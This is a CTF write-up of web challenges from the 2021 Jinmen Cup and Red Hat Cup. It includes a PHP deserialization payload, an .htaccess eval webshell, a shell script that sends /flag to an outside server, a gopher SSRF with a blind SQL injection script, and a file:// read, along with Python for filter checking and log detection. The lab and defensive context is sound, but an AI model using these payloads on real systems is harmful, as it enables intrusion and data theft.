CTF Notes (13): 2021 红帽杯 (Red Hat Cup) & 津门杯 (Jinmen Cup) Web


津门杯 (Jinmen Cup)

power_cut

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;

    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);

    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('echo flag{123}')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }

}

$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);

?>

readfile() in the logger constructor echoes the file contents straight into the response.

Payload:

log=O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
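The payload works because the blacklist is applied once and is not idempotent: stripping `flag` from `flflagag` leaves `flag`, and the string length `s:5` already matches the post-filter value. The following is an added Python example, not part of the write-up; it re-implements the PHP filter in Python to show the idempotence check a reviewer would run and the refuse-rather-than-clean policy that unserialize() on user input needs.

```python
import re

# Python re-implementation of the challenge's single-pass filter:
# preg_replace("/[<>*#'|?\n ]/", "", $log) followed by str_replace('flag', '', $log).
CHAR_BLACKLIST = re.compile(r"[<>*#'|?\n ]")
# Any PHP serialized-object token; `O:6:"weblog"` is what the payload carries.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"')


def sanitize_once(s: str) -> str:
    """One pass, exactly like the PHP code: nested 'flflagag' collapses to 'flag'."""
    return CHAR_BLACKLIST.sub("", s).replace("flag", "")


def is_idempotent_on(s: str) -> bool:
    """A blacklist filter is safe to apply once only if a second pass is a no-op.
    Returns False for inputs where stripping creates a new forbidden token."""
    once = sanitize_once(s)
    return sanitize_once(once) == once


def sanitize_fixpoint(s: str, max_rounds: int = 16) -> str:
    """Re-apply the filter until the output stops changing."""
    for _ in range(max_rounds):
        out = sanitize_once(s)
        if out == s:
            return out
        s = out
    raise ValueError("filter did not converge")


def accept_for_unserialize(s: str) -> bool:
    """Policy the challenge code lacks: refuse instead of cleaning. Reject any
    input carrying an object token (the effect of allowed_classes => false) and
    any input on which the filter is not idempotent."""
    return not SERIALIZED_OBJECT.search(s) and is_idempotent_on(s)


if __name__ == "__main__":
    payload = 'O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}'
    print(sanitize_once(payload))          # filter hands unserialize() a clean "/flag"
    print(sanitize_fixpoint(payload))      # the fixed point strips it down to "/"
    print(accept_for_unserialize(payload))  # False: object token present, not idempotent
```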

uploadhub

Upload a .htaccess:

<FilesMatch "index"> 
SetHandler application/x-httpd-php
php_flag engine on
Require all granted
</FilesMatch>
#start:<?php eval($_GET['cmd']);?>:end
php_value auto_prepend_file ".htaccess"

Then upload any file whose name contains "index" and request it to get execution.

hate_php

At first I tried XOR / bitwise-NOT encoding to get past the regex, for example:

(~%8F%97%8F%96%91%99%90)();

That did not work. Looking for the reason, I found the PHP version is 5.6.

Then I found this article:

无字母数字Webshell之提高篇_执行 (sohu.com) ("Non-alphanumeric webshells, advanced: execution")

Because the sink is eval rather than system, and the filter prevents calling system inside the eval, only the backtick operator can be used.

So there is no output. I therefore tried writing a file and then requesting it, but writing failed; I tried curl or wget to send the result back to my own server, which also failed; finally I realised the shell could invoke PHP's file_get_contents to reach my server. The constructed POST request is as follows:

POST /?code=`.%20/???/????????[?-[]`; HTTP/1.1
Host: 122.112.214.101:20004
Content-Length: 389
Pragma: no-cache
Cache-Control: no-cache
Origin: http://122.112.214.101:20004/
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryflRQ1tAa2PBCh9My
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
x-forwarded-for: 165.62.3.27
Connection: close

------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

#!/bin/sh
a=`cat /flag`;php -r "file_get_contents('http://3423.cn1.utools.club/a.php?nani=$a');"
------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryflRQ1tAa2PBCh9My--

The flag then shows up in my own server's logs.

easysql

This one was a bit hard.

First, directory scanning finds admin.php, but requesting it directly returns a 302 redirect to index.php.

admin.php can be reached by having curl fetch it over gopher://.

Then, following the hint, POST a poc parameter and try injection.

Blind-injection script below; note that the Content-Length inside the gopher payload has to be adjusted to the payload length.

# by CubeStone
import requests
import time
import sys

def Injector(url,length,sleep,method=None,data=None,known="",sign=None):
    # Binary-search each character. A request timeout (the sleep() fired) or a
    # missing success sign means the true character is greater than the guess.
    sign=sign if method=="post" else method
    basename=known
    length=int(length)
    sleep=float(sleep)
    for i in range(1,length+1):
        try:
            if basename[-1]=='\0':
                break
        except IndexError:
            pass
        l=31;r=128;p=(l+r)//2
        while l<r:
            print(chr(p),end="\r")
            try:
                if method!="post":
                    # rewrite the Content-Length (76) baked into the gopher payload
                    # to match the digit widths of {char} and {length}
                    res=requests.get(url.replace("76",str(len(str(p))-2+len(str(len(known)+i))-1+76)).format(char=p,length=len(known)+i),timeout=5)
                else:
                    res=requests.post(url,data=bytes(data.format(char=p,length=len(known)+i),encoding="utf-8"),timeout=2,headers={"content-type":"application/x-www-form-urlencoded"})
            except Exception:
                l=p+1
            else:
                if sign is None:
                    r=p
                elif sign not in res.text:
                    l=p+1
                else:
                    r=p
            p=(l+r)//2
        basename+=chr(p)
        print(basename)
        if sleep!=0:time.sleep(sleep)
    return basename

if __name__ == "__main__":
    if len(sys.argv) <=2:
        print("usage: python3 AutoInjector.py <url:http://xxx?\\payload> <length> <sleep> [<method:post> <data:\\payload>] [knownwords] [success_sign] \n\\payload:must include '{length}' '{char}',and 'sleep(2)' if no [success_sign]\nExample: python3 BlindInjector.py \"http://826a3fbc-cf97-4e95-95bf-5bae549406a0.node3.buuoj.cn/check.php?username=' or sleep(2) and ascii(mid((SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'geek'),{length},1)>{char} and '1&password=683union\" 20 0.2")
    else:
        Injector(*sys.argv[1:])
        print("                                                  ")

Payload:

python .\CompareInjector.py "http://121.36.147.29:20001/?url=gopher%3A%2F%2F127.0.0.1%3A80%2F_POST%20%2Fadmin.php%20HTTP%2F1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2Fx-www-form-urlencoded%250d%250aContent-Length%3A%2076%250d%250a%250d%250apoc%253D1)%2520and%2520if(ascii(mid((SELECT%2520%2560flag%2560%2520FROM%2520%2560flag%2560)%252C{length}%252C1))%253E{char}%252Csleep(9)%252C0)%2520--%2520" 40 0.2

红帽杯 (Red Hat Cup)

find_it

Directory scanning finds robots.txt,

which reveals a backup of index.php:

.1ndexx.php.swp

With the source in hand, auditing shows it can write a file, so try writing a phpinfo:

?code=<?php%20phpinfo();?>

The flag turned out to be in the phpinfo output.

framework

A yiiframework challenge. I guessed it would be a CVE, and Baidu turned up a deserialization vulnerability in yii2 from last year. According to the reproduction blogs online the yii version has to be below 2.0.35; the challenge ships its source, and the version is 2.0.32, so this is presumably the hole. Auditing shows an exploitable unserialize in sitecontroller. Reproduced successfully in a local environment.

websitemanager

F12 shows the images are loaded through image.php?id=xxx; try injection there to get the username and password:

if(ascii(mid((select%0agroup_concat(password)from(users)),%d,1))>%d,1,0)

After logging in it redirects to curl.php; try the file protocol to read the flag file:

file:///flag
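Detection logic for the two request patterns in the easysql and websitemanager sections (a gopher:// fetch into the loopback admin.php carrying a time-based blind payload, a boolean blind in image.php?id=, and a file:// read through curl.php), as an added example that is not part of the write-up. The log lines and client IPs are constructed; the parameter names url and id are taken from the challenges above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (placeholder client IPs), shaped like the requests above.
SAMPLE_LOGS = [
    '10.0.0.5 - - [09/May/2021:10:00:01 +0800] "GET /?url=gopher%3A%2F%2F127.0.0.1%3A80%2F_POST%20'
    '%2Fadmin.php%20HTTP%2F1.1%250d%250a%250d%250apoc%253D1)%2520and%2520if(ascii(mid((SELECT%2520'
    '%2560flag%2560%2520FROM%2520%2560flag%2560)%252C3%252C1))%253E64%252Csleep(9)%252C0)%2520--%2520 HTTP/1.1" 200 12',
    '10.0.0.5 - - [09/May/2021:10:00:02 +0800] "GET /image.php?id=1%20and%20if(ascii(mid((select%0a'
    'group_concat(password)from(users)),1,1))>64,1,0) HTTP/1.1" 200 3210',
    '10.0.0.7 - - [09/May/2021:10:00:03 +0800] "GET /curl.php?url=file:///flag HTTP/1.1" 200 44',
    '10.0.0.9 - - [09/May/2021:10:00:04 +0800] "GET /image.php?id=7 HTTP/1.1" 200 8192',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Loopback / private targets that a server-side fetch should never be pointed at.
INTERNAL_HOST = re.compile(r"^(127\.|10\.|192\.168\.|localhost|\[::1\])")


def decode_fully(s: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable: the gopher payload is encoded twice
    (%250d -> %0d -> CR), so a single decode would miss the SQL inside it."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            return d
        s = d
    return s


def classify(line: str) -> list:
    """Return the indicator names that fire on one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    for key, values in parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).items():
        for value in values:
            v = decode_fully(value).lower()
            if key == "url":  # the parameter the challenge hands to curl
                scheme, _, rest = v.partition("://")
                if scheme in ("gopher", "dict") and INTERNAL_HOST.match(rest):
                    hits.append("ssrf-internal-" + scheme)
                elif scheme == "file":
                    hits.append("ssrf-file-read")
            if re.search(r"\bsleep\s*\(", v):
                hits.append("sqli-time-based")
            if re.search(r"ascii\s*\(\s*mid\s*\(", v):
                hits.append("sqli-blind-extraction")
    return hits
```

Run `classify` over each entry of `SAMPLE_LOGS`: the first line fires all three indicators, the plain `id=7` request fires none.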

Done.
